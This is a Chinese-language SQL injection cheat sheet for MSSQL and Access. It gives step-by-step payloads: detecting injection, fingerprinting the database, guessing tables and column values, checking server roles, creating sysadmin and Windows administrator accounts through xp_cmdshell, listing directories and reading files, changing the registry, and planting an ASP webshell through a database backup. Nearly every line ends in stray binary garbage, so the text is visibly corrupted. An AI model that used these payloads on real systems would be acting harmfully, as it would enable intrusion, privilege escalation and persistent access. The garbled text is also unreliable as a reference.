1.判断是否有注入;and 1=1 ;and 1=2 '���EH���
2.初步判断是否是mssql ;and user>0 $�&n2�4�0(
n{qw��]/��
3.注入参数是字符'and [查询条件] and ''=' +lD��G��r/
0%&fUz36E6
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �Jq�?^8��y
�=?I1V�#.
5.判断数据库系统 {%�+3�D,$)
gq�HH H�h
;and (select count(*) from sysobjects)>0 mssql ���4?*"7t3
nkC����Re�
;and (select count(*) from msysobjects)>0 access W�O \lny!�
(X�`t"*y"�
;2xXX,'�R7
��E�Da08+Y
6.猜数据库 ;and (select Count(*) from [数据库名])>0 z*k��3q`=>
*C:�q� _�/
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 -SC2Zgi)A
fXXm@�tMx>
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 b$�`4�N�n|
"|l��
oSf@
9.(1)猜字段的ascii值(access) 9��(�FcA5Y
2Ad�Hj&XE�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 )/N Xh�'��
0or6_���y6
(2)猜字段的ascii值(mssql) $nD k
mKl�
p�S|J�D�Mo
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 o y%�g{,V�
;�ZqD60%\�
10.测试权限结构(mssql) ow>[#�.ua
aY�1#K6(y�
"6�Hj�ji@A
"*�>QxA%c4
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Z]>�e�& �N
C7*�Yg$`{�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ��+[l{C+�p
��PR�f\6 �
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �~pBx�FA��
dU04/]modD
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- $m�%/veD k
{D2�d({�7
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- O��9 Au =�
T�Xk"[>,:H
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- cF�<DUr)Ve
NN��pa69U
;and 1=(select IS_MEMBER('db_owner'));-- $MVeM�gPa�
��E6&uZ�r�
+�WEO]q?�K
93�p9?4;n-
11.添加mssql和系统的帐户 >�8HRnCyp/
&)�'�kX���
;exec master.dbo.sp_addlogin username;-- ���Ei(`g�p
;exec master.dbo.sp_password null,username,password;-- �;�>�hP�Hx
H(ftOd�.�y
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- oO9�iB��:w
+�z/73�s0~
;exec master.dbo.xp_cmdshell 'net user username password w\Ev�e:���
sAAIyPJts�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- )�d�a8�R�u
_"e(
^�yiK
;exec master.dbo.xp_cmdshell 'net user username password /add';-- T=�KrT��7�
�n�#AH@`&i
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- U��c;�IPS�
Cr\/<zy1-e
V�\lF��:3C
Qz90 �m�b�
12.(1)遍历目录 Mh�B�=+S[@
O�N=le���y
;create table dirs(paths varchar(100), id int) K1:�)J.ca_
�vP;tgW9Qk
;insert dirs exec master.dbo.xp_dirtree 'c:\' k5\
zGsol
/|^�^v �DL
;and (select top 1 paths from dirs)>0 Sx�QDqo�A~
GnHf9
J�rR
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ;7{�wa�]
UVR�V7^eTe
^rb7��`s#G
|"&4"nw�a�
(2)遍历目录 �e�/�~<\��
<�}>�-ip�?
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �S�^_yiV
S
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 fH{$�LjH(
XSI�O��0ep
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �&%5��1jM<
6h�"��?�3w
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ,=yIfbFQ��
j>=���".^J
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 fA,!�d J�
5%�$kAJZC-
�nr6[��r�q
�g5]DA.&(�
13.mssql中的存储过程 @�y�%qQe/g
_�e^V��\O>
xp_regenumvalues 注册表根键, 子键 �h��I�HO a
~0���t'+.
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �$���O�>MV
RLr-xg$K-t
xp_regread 根键,子键,键值名 N1�t:i? q&
pfIvBU��?�
;exec xp_regread 7}?z=�LHb3
RozsR�t�;i
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 h�km3\�wg�
ZuON@�(���
xp_regwrite 根键,子键, 值名, 值类型, 值 z�#�!Cg*K(
}e6:&`a xD
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 =sw��cmab;
l0�,O4k2�'
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 #@`^���
�.
��9]��9(�o
xp_regdeletevalue 根键,子键,值名 �DA\O,^49h
�B)�i��JH�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 `hh�G^��O_
au�v\f�R :
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 mcr�acj[�B
�:H�7 "�W<
1A
*8Jnw
{�hR23eE)#
14.mssql的backup创建webshell <>G�yG-��q
�1 ErYob.p
use model �WNi<|A#T{
��&ICO{#v5
create table cmd(str image); z�AIC5fv�u
{,��X(f�J
insert into cmd(str) values (''); }9dgm[�C[b
�w9BH>56/"
backup database model to disk='c:\l.asp'; �u?�i1n=Ne
H�Bu>BSv:�
��bv�K�i0-
�}2{#=Elh
15.mssql内置函数 c`�Cn9��bX
Ky|0IKE8Z�
;and (select @@version)>0 获得Windows的版本号 H�B^azHr��
��%�mJ)pMV
;and user_name()='dbo' 判断当前系统的连接用户是不是sa tI�w4�V^'|
Sf�R_#"Uu�
;and (select user_name())>0 爆当前系统的连接用户 PGDlSB�^�O
X35hLp8 M�
;and (select db_name())>0 得到当前连接的数据库 6P8X)3CE<T
G�_@H:4$3�
4�RNzh``u�
`�p�r��,lL
16.简洁的webshell Y�V�i]f2F%
&�iivSc;#�
use model )1�ciO+_��
{s�]eXc]K}
create table cmd(str image); �K9iR>p�ut
�e$Ej7_.#;
insert into cmd(str) values (''); Yy�]He�nw;
U�Wp(�3FQ�
backup database model to disk='g:\wwwtest\l.asp';
